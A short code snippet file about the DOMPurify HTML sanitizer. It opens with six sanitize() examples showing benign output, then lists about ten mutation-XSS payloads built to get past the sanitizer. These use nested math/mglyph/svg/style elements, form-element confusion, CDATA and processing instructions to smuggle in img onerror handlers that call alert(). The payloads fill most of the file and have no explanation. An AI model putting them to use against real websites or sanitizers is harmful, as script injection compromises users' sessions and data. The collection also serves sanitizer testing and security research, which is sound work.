DOMPurify.sanitize('<img src=x onerror=alert(1)//>'); // becomes <img src="x">
DOMPurify.sanitize('<svg><g/onload=alert(2)//<p>'); // becomes <svg><g></g></svg>
DOMPurify.sanitize('<p>abc<iframe//src=jAva&Tab;script:alert(3)>def</p>'); // becomes <p>abc</p>
DOMPurify.sanitize('<math><mi//xlink:href="data:x,<script>alert(4)</script>">'); // becomes <math><mi></mi></math>
DOMPurify.sanitize('<TABLE><tr><td>HELLO</tr></TABL>'); // becomes <table><tbody><tr><td>HELLO</td></tr></tbody></table>
DOMPurify.sanitize('<UL><li><A HREF=//google.com>click</UL>'); // becomes <ul><li><a href="//google.com">click</a></li></ul>

<?xml-stylesheet > <img src=x onerror="alert('DOMPurify bypassed!!!')"> ?>
<?img ><img src onerror=alert(1)>?>
<![CDATA[ ><img src onerror=alert(1)> ]]>

<math><mtext><h1><a><h6></a></h6><mglyph><svg>
<mtext><style><a title="</style><img src onerror='alert(1)'>"></style></h1>

<form><math><mtext></form><form><mglyph><svg>
<mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">

<math><mtext><table><mglyph><style>
<!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">

<math><mtext><table><mglyph><style>
<!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

<form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">